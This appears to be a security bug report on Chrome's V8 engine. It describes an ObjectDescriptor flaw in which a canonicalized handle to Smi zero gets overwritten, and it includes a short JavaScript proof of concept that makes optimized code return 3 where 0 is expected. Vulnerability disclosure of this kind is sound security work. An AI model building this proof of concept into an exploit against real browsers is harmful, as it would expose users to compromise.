Chrome: V8: A bug in the ObjectDescriptor class Here's HandleScope::GetHandle and CanonicalHandleScope::Lookup used to get a handle location. Object** HandleScope::GetHandle(Isolate* isolate, Object* value) { DCHECK(AllowHandleAllocation::IsAllowed()); HandleScopeData* data = isolate->handle_scope_data(); CanonicalHandleScope* canonical = data->canonical_scope; return canonical ? canonical->Lookup(value) : CreateHandle(isolate, value); } Object** CanonicalHandleScope::Lookup(Object* object) { DCHECK_LE(canonical_level_, isolate_->handle_scope_data()->level); ... Object*** entry = identity_map_->Get(object); if (*entry == nullptr) { // Allocate new handle location. *entry = HandleScope::CreateHandle(isolate_, object); } return reinterpret_cast(*entry); } As you can see above, if the method is called within a CanonicalHandleScope scope, it checks if there's a cache for the given value, if there is, returns the cached location, otherwise, creates one for it. The above routine implies that it's not a good idea to change the value of the handle as shown in the following example code. CanonicalHandleScope canonical(isolate); Handle a(Smi::kZero, isolate); *a.location() = Smi::FromInt(2); Handle b(Smi::kZero, isolate); // b.location() == a.location() b->value(); // == 2 But the ObjectDescriptor class does that. Here's a snippet of the class ( void CreateTemplates(Isolate* isolate, int slack) { ... temp_handle_ = handle(Smi::kZero, isolate); } void AddNamedProperty(Isolate* isolate, Handle name, ClassBoilerplate::ValueKind value_kind, int value_index) { Smi* value = Smi::FromInt(value_index); ... *temp_handle_.location() = value; ... } PoC: // Flags: --allow-natives-syntax function deferred_func() { class C { method1() { } } } let bound = (a => a).bind(this, 0); function opt() { deferred_func.prototype; // ReduceJSLoadNamed return bound(); } print(opt()); // 0 %OptimizeFunctionOnNextCall(opt); print(opt()); // must print out 0, but actually it prints out 3 How the PoC works: 1. GetOptimizedCode uses CanonicalHandleScope. 2. JSNativeContextSpecialization::ReduceJSLoadNamed calls JSFunction::EnsureHasInitialMap which tries to compile the given function(deferred_func in the PoC). 1. So ObjectDescriptor is used. 3. The ObjectDescriptor::AddNamedProperty method changes the value of handle(Smi::kZero, isolate) to "3". 4. Loading the bound function's arguments is reduced with: jsgraph()->Constant(handle(bound_arguments->get(i), isolate()))) 1. handle(bound_arguments->get(i), isolate()) returns the same handle, of which the value is "3", used in the vulnerable class. Note that the PoC doesn't crash. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt